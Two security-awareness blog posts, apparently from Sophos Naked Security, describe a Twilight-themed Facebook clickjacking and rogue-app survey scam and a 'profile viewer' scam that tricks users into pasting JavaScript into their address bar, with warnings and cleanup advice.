The Twilight Breaking Dawn Facebook scam

Facebook users are finding themselves tagged in their online friends’ photo albums, in an attack seemingly targeted at fans of the “Twilight” teen vampire romance movies.

Following an attack against photo albums using an image of a Playboy-style bunny girl, scammers are now pretending to link to a game promoting the upcoming movie “Twilight Breaking Dawn” starring heart throbs Robert Pattinson and Kristen Stewart as the starcrossed lovers Edward Cullen and Bella Swan.

As well as Facebook photo albums, users are also being tricked into “Liking” the scam links.

Twilight Breaking Dawn message

Play Twilight: Breaking Dawn
Be the first of your friends to play the awesome new Twilight game on Facebook!

If you click on such a link then you will be taken to a Facebook page which to all intents and purposes appears to be promoting an online game, being used to market Twilight Breaking Dawn.

Twilight Breaking Dawn on Facebook

But if you click on the button marked “Play Now” then you will be clickjacked into saying you “Like” the link, thus spreading the link virally to your Facebook friends.

If you’re running a protection against clickjacking, such as Firefox add-on NoScript, then you will be warned – but most people are probably unaware that the page has secretly claimed that they like the game, even though no game has yet been played!

NoScript warning of clickjacking

The scam doesn’t end there, however, as that would simply spread the link without earning any money for the ne’er-do-wells behind it.

Users are then presented with a dialog, asking them to grant permission for a third party application to access their Facebook account, and post messages, updates and photos to their wall.

Rogue app requests permission

Of course, if you’re a fan of “Twilight” you will quite possibly grant permission without thinking. The only problem being that this isn’t a legitimate application request, but being done by a rogue app which wants to make money out of your devotion to the works of Stephenie Meyer’s series of novels.

Predictably, with the ability to now post to your Facebook account, the scammers now present the final piece of the jigsaw: an online survey which earns them affiliate commission for each person who completes the questionnaire.

Survey scam

You will note that the survey deliberately presents itself in a convincing Facebook style, which may trick some users into believing that it is legitimate.

It seems that fans of Twilight are only too easy pickings for Facebook scammers, judging by the large number of reports from affected Facebook users we are seeing today.

If you’ve been affected by this scam, you should clean up your account before any further damage is done.

I’ve made a YouTube video where I show you how to clean-up your Facebook account if you were hit by this, or similar scams on Facebook:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you stay informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos Facebook page, where more than 70,000 people regularly share information on threats and discuss the latest security news.

You could also do a lot worse than check out our best practices for better privacy and security on Facebook guide.

Hat tip: Thanks to Naked Security reader Drew who was the first (of many!) to tell us about this scam.

Facebook scam with a difference – Social Tagging Worldwide avoids rogue apps

Vigilant Naked Security reader Mike Greer, of Cedar Park, Texas, has brought the latest Facebook “profile viewer” scam to our attention.

We write regularly about this sort of scam, which is common on Facebook, on Twitter, and even on both at the same time.

One of the reasons people fall for these scams is that they promise to provide what sounds like useful data – a list of the people who are most interested in your activities. In particular, most of the scams imply that anyone who is stalking you is likely to end up at the top of the list of people who check your profile.

(Of course, the people at the top of the list might equally well be your closest and most trusted friends. But profile view scams sell better on fear than on comfort.)

Most scams of this sort persuade you to install a rogue Facebook application and give it permission to access your account. But this latest scam, centred around a Facebook community called Social Tagging Worldwide, takes a different approach.

The Social Tagging Worldwide page is much more direct. It tries to trick you into pasting JavaScript directly in your browser and running it. Naturally, this bypasses any checks which Facebook might apply to the script if it were served up from, or wrapped inside, a web page sourced from Facebook itself.

Claiming to be “The Official Profile Viewer Application”, the page offers you a link which brings up a Facebook dialog asking you to “complete a 5 second security check to confirm you’re a Facebook user”:

The instructions sounds pretty simple, and – unlike many other Facebook scams – don’t involve asking you to take a survey as proof that you aren’t a computer. The instructions may vary depending on your browser, but will look something like this:

The trick is that you aren’t cutting-and-pasting any sort of unique ID into your browser’s address bar. You’re actually pasting a piece of Javascript and asking your browser to run it for you:

This script fetches another script – one intended to run inside pages presented by Facebook. Indeed, if you paste the offending “unique ID script” into your browser’s address bar whilst you’re on a site other than Facebook – e.g. Naked Security – you’ll see a warning that the script needs to come from Facebook itself:

But if your browser is on the original Social Tagging Worldwide community page – which is hosted by Facebook.com – and you are logged into Facebook, the pasted script runs as if it were hosted on facebook.com. Your browser thinks – indeed, effectively knows – that you’re on Facebook, because that’s the domain of the URL you are currently visiting.

The offending script in this case is designed to invite all your friends to join a specific Facebook group. No need for a rogue application.

The moral of this story is simple: BE CAREFUL WHAT YOU PASTE INTO YOUR ADDRESS BAR.

When you explicitly enter a piece of JavaScript, you’re effectively authorising your browser to run that script in the context of the site you’ve just visited. You are effectively bypassing any sort of cross-site scripting protection which either the remote site – in this case, Facebook – or your browser might have in place.

Cross-site scripting is where you trick your browser into running a script from site Y as if it were officially from site X. Pasting a script into the browser side-steps any cross-site scripting protection because there isn’t really any “cross-site” behaviour – you’re manually injecting a script into site X and thus authorising it to run yourself.

Incidentally, if you do go through with the instructions in this scam, things proceed rather predictably.

You’re asked to perform another “proof that you are human” test, and this time – I’m sure you’ve guessed already – you need to take a survey. The survey offers a prize – I’m sure you’ve guessed already – of an iPad or an iPhone:

And to win the prize – I’m sure you’ve guessed already – there’s a cost. The advance fee you’ll pay to enter the “competition” depends on your location.

I’m in Singapore right now, where I was expected to send a pricy SMS and agree to accept SMS marketing:

By the way, there’s a simple, non-technical, rule which will protect you from almost all scams of this sort:

IF IT SOUNDS TOO GOOD TO BE TRUE, IT IS TOO GOOD TO BE TRUE!

Make sure that you stay informed about the latest online scams. Join the Sophos Facebook page, where more than 70,000 people regularly share information on threats and discuss the latest security news.

While you’re about it, why not check out our Facebook security best practice guide? Learn how to protect your privacy and identity on Facebook.